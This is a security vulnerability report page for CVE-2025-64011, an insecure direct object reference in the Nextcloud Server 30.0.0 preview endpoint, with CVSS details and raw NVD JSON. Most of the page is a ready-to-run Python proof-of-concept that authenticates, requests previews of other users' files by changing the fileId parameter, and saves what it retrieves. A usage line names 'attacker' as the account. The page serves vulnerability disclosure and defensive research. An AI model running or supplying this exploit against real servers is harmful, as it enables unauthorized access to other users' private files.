Security Vulnerability Report
CVE-2025-64011 CVSS 4.3 MEDIUM

CVE-2025-64011

Published: 2025-12-12 17:15:45
Last Modified: 2025-12-19 15:47:19

Description

Nextcloud Server 30.0.0 is vulnerable to an Insecure Direct Object Reference (IDOR) in the /core/preview endpoint. Any authenticated user can access previews of arbitrary files belonging to other users by manipulating the fileId parameter. This allows unauthorized disclosure of sensitive data, such as text files or images, without prior sharing permissions.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:nextcloud:nextcloud_server:30.0.0:-:*:*:*:*:*:* - VULNERABLE
Nextcloud Server 30.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-64011 PoC - Nextcloud Server IDOR in /core/preview
# Authenticated users can access arbitrary file previews via fileId manipulation


def exploit_nextcloud_idor(base_url, username, password, target_file_id):
    """
    Exploit Nextcloud Server IDOR vulnerability in /core/preview endpoint

    Args:
        base_url: Nextcloud server base URL (e.g., 'https://cloud.example.com')
        username: Valid Nextcloud username
        password: Password for the account
        target_file_id: File ID of the target file to preview

    Returns:
        Preview image/content if successful, None otherwise
    """
    session = requests.Session()

    # Step 1: Authenticate to Nextcloud
    login_url = f"{base_url}/index.php/login"
    login_data = {
        'user': username,
        'password': password,
        'timezone': 'UTC',
        'timezone_offset': '0'
    }
    try:
        response = session.post(login_url, data=login_data, timeout=10)
        if response.status_code != 200:
            print(f"[-] Authentication failed with status {response.status_code}")
            return None
        print(f"[+] Successfully authenticated as {username}")
    except requests.RequestException as e:
        print(f"[-] Authentication error: {e}")
        return None

    # Step 2: Exploit IDOR by requesting preview with target fileId
    preview_url = f"{base_url}/core/preview?fileId={target_file_id}&x=32&y=32&a=1&mode=cover"
    try:
        response = session.get(preview_url, timeout=10)
        if response.status_code == 200 and len(response.content) > 0:
            print(f"[+] Successfully accessed preview for file ID: {target_file_id}")
            print(f"[+] Content-Type: {response.headers.get('Content-Type', 'Unknown')}")
            print(f"[+] Content-Length: {len(response.content)} bytes")

            # Save the preview image
            output_file = f"preview_{target_file_id}.jpg"
            with open(output_file, 'wb') as f:
                f.write(response.content)
            print(f"[+] Preview saved to: {output_file}")
            return response.content
        else:
            print(f"[-] Failed to access preview. Status: {response.status_code}")
            return None
    except requests.RequestException as e:
        print(f"[-] Request error: {e}")
        return None


# Usage example
if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python cve_2025_64011_poc.py <base_url> <username> <password> <target_file_id>")
        print("Example: python cve_2025_64011_poc.py https://cloud.example.com attacker password 12345")
        sys.exit(1)

    base_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    target_file_id = sys.argv[4]

    exploit_nextcloud_idor(base_url, username, password, target_file_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64011", "sourceIdentifier": "[email protected]", "published": "2025-12-12T17:15:45.210", "lastModified": "2025-12-19T15:47:19.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Server 30.0.0 is vulnerable to an Insecure Direct Object Reference (IDOR) in the /core/preview endpoint. Any authenticated user can access previews of arbitrary files belonging to other users by manipulating the fileId parameter. This allows unauthorized disclosure of sensitive data, such as text files or images, without prior sharing permissions."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:30.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "E9029EB2-D570-4989-A86B-10E9107FB0E9"}]}]}], "references": [{"url": "https://drive.google.com/file/d/1eD3PN-u1caZYgGH96XHmJ7h_OBXEAHW4/view?usp=sharing", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://gist.github.com/tarekramm/586dfe2d113fedfee6d71182570fc090", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://nextcloud.com", "source": "[email protected]", "tags": ["Product"]}]}}